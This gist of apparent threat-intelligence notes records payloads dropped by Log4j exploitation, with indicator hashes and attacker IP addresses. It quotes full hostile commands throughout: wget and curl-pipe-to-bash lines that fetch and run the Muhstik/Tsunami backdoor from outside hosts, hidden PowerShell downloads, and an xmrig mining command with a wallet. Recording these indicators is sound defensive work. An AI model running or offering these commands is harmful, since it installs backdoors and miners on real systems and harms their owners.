Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Log4j Payload Dropped
45.130.229.168:1389/Exploit.class
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl http://18.228.7.109/.log/log
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
wget -O /tmp/pty1 http://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty5 http://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &
pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898
--> download of Muhstik/Tsunami
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - http://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash
m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
######
Exploit.class
2b5f04d15e459132a5935260746788db39b469ea46859c4a5bb8625f8a80bd41
--> uses curl on linux for download of http://18.228.7.109/.log/log
--> and uses powershell on Windows
(new-object System.Net.WebClient).Downloadfile('http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd', 's.cmd')
s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634
--> downloads xmrig
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
@hackinghippo
Copy link

hackinghippo commented Dec 15, 2021

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment